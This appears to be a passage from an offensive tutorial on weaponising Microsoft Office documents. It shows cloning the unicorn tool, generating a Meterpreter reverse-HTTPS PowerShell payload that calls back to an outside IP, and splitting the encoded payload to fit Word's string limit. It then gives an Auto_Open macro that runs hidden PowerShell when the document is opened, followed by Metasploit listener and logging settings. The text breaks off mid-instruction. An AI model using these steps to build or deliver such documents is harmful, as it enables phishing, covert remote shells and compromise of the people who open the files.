Clone unicorn and cd to it:
`$ git clone <https://github.com/trustedsec/unicorn> $ cd unicorn`
Generate powershell payload via unicorn:
`$ python unicorn.py windows/meterpreter/reverse_https 126.96.36.199 443 [*] Generating the payload shellcode. This could take a few seconds/minutes as we create the shellcode... [*] Exported powershell output code to powershell_attack.txt. [*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create a listener. Then you can find your payload in powershell_attack.txt file. Copy it and paste to your macros in a doc file.`
When you try to insert payload genetated beunicorn Microsoft Word/Excel might throw an error about string length. You can bypass it. Break the string into multiple substrings and then just concatenate them. Now you macro should look like this:
`Sub Auto_Open() Dim exec As String str1 = "powershell -window hidden -e JABCAGMAVQA...ABBAGw" ... str31 = "UALgBHAGUAdABCA...2ADQAX" str32 = "ABXAGkAbgB...ADsAfQA=" exec = str1 + str2 + str3 + str4 + str5 + str6 + str7 + str8 + str9 + str10 + str11 + str12 + str13 + str14 + str15 + str16 + str17 + str18 + str19 + str20 + str21 + str22 + str23 + str24 + str25 + str26 + str27 + str28 + str29 + str30 + str31 + str32 Shell (exec) End Sub Sub AutoOpen() Auto_Open End Sub`
Auto_Open the payload is able to be executed in different versions of Microsoft Word.
Sometimes it’s a good idea to use staged payload like described above, sometime not. If you have a small one (for example you just want to drop nc like shell) you can use unicorn again. Write a script in powershell save it and the just run:
`unicorn.py <path to your script>`
This will generate your payload to paste into your doc file.
It’s always better to start msfconsole in screen. So run:
It’s a clever idea to enable logging in metasploit because you don’t want to miss something later:
`msf> spool mylog.log`
Now let’s can make metasploit a bit more talkative, so set:
`msf> set ConsoleLogging true msf> set LogLevel 5 msf> set SessionLogging true msf> set TimestampOutput true`
You can change your prompt, for example, to: